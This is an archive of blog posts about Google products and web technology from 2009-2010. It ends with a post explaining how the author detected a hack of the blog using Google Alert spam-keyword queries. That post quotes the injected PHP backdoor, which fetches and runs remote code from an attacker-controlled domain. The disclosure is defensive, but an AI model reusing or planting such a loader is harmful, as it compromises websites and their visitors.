Google Crisis Response and Relief

May 25th, 2010

Google’s Crisis Response team has a landing page for the Gulf oil spill featuring overlays for Google Maps/Earth. This joins their pages for other recent natural disasters, such as the earthquakes in Haiti, Chile and China. Some support ‘crowsourcing’ by allowing people to upload information, data and queries.


Google Crisis Response page for the 2010 Gulf oil spill

Google Crisis Response page for the 2010 Gulf oil spill



Here’s how the Google team describes their work and mission:

“Working with the input of subject matter experts and in conjunction with like-minded organizations and the development community at large, Google Crisis Response facilitates the development and refinement of crisis response technology—with the ultimate goal of helping victims help themselves and helping first responders/relief agencies/governments/citizens help victims.

When a major disaster strikes, the Google Crisis Response team collects fresh high-resolution imagery plus other event-specific data, then publishes this information on a dedicated landing page.

Google Crisis Response Mission

To develop, maintain, and optimize a worldwide, rapid-deployment protocol to speed the dissemination of situational information and increase the efficacy of rescue and humanitarian aid activities in response to quick-onset disasters.

Google Crisis Response will:

  • Coordinate with other platforms, organizations and teams
  • Build tools to surface near-real-time data
  • Support response/relief organizations
  • Respond in times of crisis

There doesn’t seem to be a list of these pages online, but here are a few:


A review of the Google Go programming language

November 12th, 2009

Mark Chu-Carroll is a Google software engineer who’s written a long, detailed and informed review of Google’s new programming language Go. It’s worth a read if you are interested in understanding what it’s like as a programming language. Here’s a few points that I took note of.

    “The guys who designed Go were very focused on keeping things as small and simple as possible. When you look at it in contrast to a language like C++, it’s absolutely striking. Go is very small, and very simple. There’s no cruft. No redundancy. Everything has been pared down. But for the most part, they give you what you need. If you want a C-like language with some basic object-oriented features and garbage collection, Go is about as simple as you could realistically hope to get.”

    “The most innovative thing about it is its type system. … It ends up giving you something with the flavor of Python-ish duck typing, but with full type-checking from the compiler.”

    “Go programs compile really astonishingly quickly. When I first tried it, I thought that I had made a mistake building the compiler. It was just too damned fast. I’d never seen anything quite like it.”

    “At the end of the day, what do I think? I like Go, but I don’t love it. If it had generics, it would definitely be my favorite of the C/C++/C#/Java family. It’s got a very elegant simplicity to it which I really like. The interface type system is wonderful. The overall structure of programs and modules is excellent. But it’s got some ugliness. … It’s not going to wipe C++ off the face of the earth. But I think it will establish itself as a solid alternative.”

Go sounds like a language that will help you grow as a computer scientist if you use it. That’s a good enough recommendation for me.


Google VP on semantic search and the Semantic Web

November 11th, 2009

PCWorld has a story, Google VP Mayer Describes the Perfect Search Engine, with some interesting comments on semantic search from Marissa Mayer, Google’s vice president of Search Products & User Experience.

“IDGNS: What’s the status of semantic search at Google? You have said in the past that through “brute force” — analyzing massive amounts of queries and Web content — Google’s engine can deliver results that make it seem as if it understood things semantically, when it really functions using other algorithmic approaches. Is that still the preferred approach?

Mayer: We believe in building intelligent systems that learn off of data in an automated way, [and then] tuning and refining them. When people talk about semantic search and the semantic Web, they usually mean something that is very manual, with maps of various associations between words and things like that. We think you can get to a much better level of understanding through pattern-matching data, building large-scale systems. That’s how the brain works. That’s why you have all these fuzzy connections, because the brain is constantly processing lots and lots of data all the time.

IDGNS: A couple of years ago or so, some experts were predicting that semantic technology would revolutionize search and blindside Google, but that hasn’t happened. It seems that semantic search efforts have hit a wall, especially because semantic engines are hard to scale.

Mayer: The problem is that language changes. Web pages change. How people express themselves changes. And all those things matter in terms of how well semantic search applies. That’s why it’s better to have an approach that’s based on machine learning and that changes, iterates and responds to the data. That’s a more robust approach. That’s not to say that semantic search has no part in search. It’s just that for us, we really prefer to focus on things that can scale. If we could come up with a semantic search solution that could scale, we would be very excited about that. For now, what we’re seeing is that a lot of our methods approximate the intelligence of semantic search but do it through other means.”

I interpret these comments to mean that Google’s management still views the concept of semantic search (and the Semantic Web) as involving better understanding of the intended meaning of text in documents and queries. The W3C’s web of data model is still not on their radar.


Dashboard shows data Google has about you

November 5th, 2009

Google added a great new service, Dashboard, that summarizes data stored for a Google account — see MY ACCOUNT>PERSONAL SETTINGS>DASHBOARD.

“Designed to be simple and useful, the Dashboard summarizes data for each product that you use (when signed in to your account) and provides you direct links to control your personal settings. Today, the Dashboard covers more than 20 products and services, including Gmail, Calendar, Docs, Web History, Orkut, YouTube, Picasa, Talk, Reader, Alerts, Latitude and many more. The scale and level of detail of the Dashboard is unprecedented, and we’re delighted to be the first Internet company to offer this — and we hope it will become the standard.”

This is a good move on Google’s part. But while there’s a lot of information included, it’s not everything that Google knows about you — e.g., data in cookies, click throughs data from search results and information from companies it’s acquired, like Doublclick. Still, it is a big step in a positive direction.


WebFinger: a finger protocol for the Web

August 15th, 2009

Maybe WebFinger will succeed where others have failed. At what? At providing a simple handle for a person that can be easily used to get basic information that the person wants to make available. The WebFinger proposal is to use an email address as the handle.

WebFinger, aka Personal Web Discovery. i.e. We’re bringing back the finger protocol, but using HTTP this time.

Techcrunch has a post on this, Google Points At WebFinger. Your Gmail Address Could Soon Be Your ID with some background.

There’s some excitement around the web today among a certain group of high profile techies. What are they so excited about? Something called WebFinger, and the fact that Google is apparently getting serious about supporting it. So what is it?

It’s an extension of something called the “finger protocol” that was used in the earlier days of the web to identify people by their email addresses. As the web expanded, the finger protocol faded out, but the idea of needing a unified way to identify yourself has not. That’s why you keep hearing about OpenID and the like all the time.

The current focus of the WebFinger group is on developing the spec for accessing a user’s metadata given their handle. Using RDF and the FOAF vocabulary should be a no-brainer for representing the metadata.


Google Reader gets more social

July 16th, 2009

The most frequent complaint about facebook I’ve seen is that it provides a button to show you like an item, but not one for dislike. Google Reader recently added new social features the ability for users to mare a post as liked but it also doesn’t allow you to indicate your dislike. You can unlike an item that you previously had liked, but that just gets you back to a neutral stance.

Google Reader gets more social

It’s probably a prudent choice, aimed at keeping things civil. But there are two schools of thought about the old adage “If you don’t have anything nice to say about someone …”, one of which ends with “come sit next to me.”.

The first time you like a post on Google Reader it warns you that it’s a public act. Indeed, clicking on the “N people liked this” link at the top of a post in Reader shows you the Google names of readers who liked it. You can click through to their Google profiles or to see a list of other liked and shared items. Public indeed! At least on facebook your likes are visible only to people who can see the corresponding item.

I think Google Reader’s new social features look like they might be useful, but time will tell.


Google is from Mars, Facebook is from Venus

June 23rd, 2009

Wired has an interesting article on Facebook vs. Google, Great Wall of Facebook: The Social Network’s Plan to Dominate the Internet — and Keep Google Out.

“Today, the Google-Facebook rivalry isn’t just going strong, it has evolved into a full-blown battle over the future of the Internet—its structure, design, and utility. For the last decade or so, the Web has been defined by Google’s algorithms—rigorous and efficient equations that parse practically every byte of online activity to build a dispassionate atlas of the online world. Facebook CEO Mark Zuckerberg envisions a more personalized, humanized Web, where our network of friends, colleagues, peers, and family is our primary source of information, just as it is offline. In Zuckerberg’s vision, users will query this “social graph” to find a doctor, the best camera, or someone to hire—rather than tapping the cold mathematics of a Google search. It is a complete rethinking of how we navigate the online world, one that places Facebook right at the center. In other words, right where Google is now.”

This is definitely a David and Goliath match, what with Facebook not having turned a profit yet. The article does a good job of pointing out how their services are different and complement one another.

At the risk of evoking discredited stereotypes, maybe Google is from Mars and Facebook is from Venus.


BlindSearch evaluates Google, Bing and Yahoo search engines

June 7th, 2009

Who’s got the best basic web search engine? One way to approach that question is to conduct an experiment in which subjects rank the results returned by several engines without knowing which is which.

BlindSearch is a simple and neat site that collects ‘objective’ opinions on search quality by showing query results from Google, Yahoo and Bing side by side without identifying which is which and inviting you to select the best.

“Type in a search query above, hit search then vote for the column which you believe best matches your query. The columns are randomised with every query.

The goal of this site is simple, we want to see what happens when you remove the branding from search engines. How differently will you perceive the results?”


BlindSearch evaluates Google, Bing and Yahoo

As of this writing there have been 1679 votes for preferred results with Google getting 39%, Bing 39% and Yahoo: 22%.

update 2:14pm edt 6/7: Google: 45%, Bing: 32%, Yahoo: 22% | 11,130 votes


Google Chrome for Linux and Mac

June 5th, 2009

How’s this for truth in advertising. The Chromium blog announces beta versions of Google Chrome for MAC OS X and Linus, but warns people not to try them in a post Danger: Mac and Linux builds available.

“In order to get more feedback from developers, we have early developer channel versions of Google Chrome for Mac OS X and Linux, but whatever you do, please DON’T DOWNLOAD THEM! Unless of course you are a developer or take great pleasure in incomplete, unpredictable, and potentially crashing software. How incomplete? So incomplete that, among other things, you won’t yet be able to view YouTube videos, change your privacy settings, set your default search provider, or even print.”

Of course, they know that this will make trying them irresistible to some of us. If that includes you, go get the Mac or Linux version.


Bing vs. Google, side by side comparison

June 1st, 2009

Microsoft’s new Bing search engine is getting a lot of interest. Glenn McDonald posts about a nice side-by-side Bing vs Google comparator tat he developed. It makes it easy to compare how the two services do on a range of different types of searches. Here are the ones that Glen said he found useful in developing his initial opinion.

I sense form some of these queries that he is probing the systems where an advanced search engine can exploit a little bit of semantic knowledge. For example, recognizing that a user’s query “boston to asheville” matches a common pattern “ to “, and she probably is interested in information about how to travel from the first location tot he second. It seems like Google has been working on adding more such patterns, at least for the low hanging fruit.

Of course, if everyone hits on this site it may get throttled or blocked by either or both of the search engines. @Glen — would you be willing to share your code?

(spotted on hacker news)


Google Wave as a new communication model

May 28th, 2009

Google wave looks interesting. Google describes it as “a new tool for communication and collaboration on the web” and it’s a funny mix of email, instant messaging, wikis, and Facebook wall interactions. Or maybe IRC for the new century. This is from a post, Went Walkabout. Brought back Google Wave, on the Google blog.

“A “wave” is equal parts conversation and document, where people can communicate and work together with richly formatted text, photos, videos, maps, and more. Here’s how it works: In Google Wave you create a wave and add people to it. Everyone on your wave can use richly formatted text, photos, gadgets, and even feeds from other sources on the web. They can insert a reply or edit the wave directly. It’s concurrent rich-text editing, where you see on your screen nearly instantly what your fellow collaborators are typing in your wave. That means Google Wave is just as well suited for quick messages as for persistent content — it allows for both collaboration and communication. You can also use “playback” to rewind the wave and see how it evolved.”

Google Wave is not available yet, but you can sign up to be notified when it’s launched.

Here’s a random thought. Our models for communication in multiagent systems (e.g., KQML and FIPA) were informed by if not based on email and, to a lesser degree, IM. If Wave is a useful new communication model for humans, does it have a counterpart for software agents? If so, I suspect that ideas from the Semantic Web will be useful to provide a “rich content” for agents.

For more views, see posts by o’reilly, techcrunch, BusinessWeek and Gabor Cselle.


Ebiquity Google alert tripwires triggered

May 21st, 2009

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.

< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like https://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)

We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
  • viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.


Google alert for a hacked website

The results of this Google search reveal many compromised blogs from the .edu domain.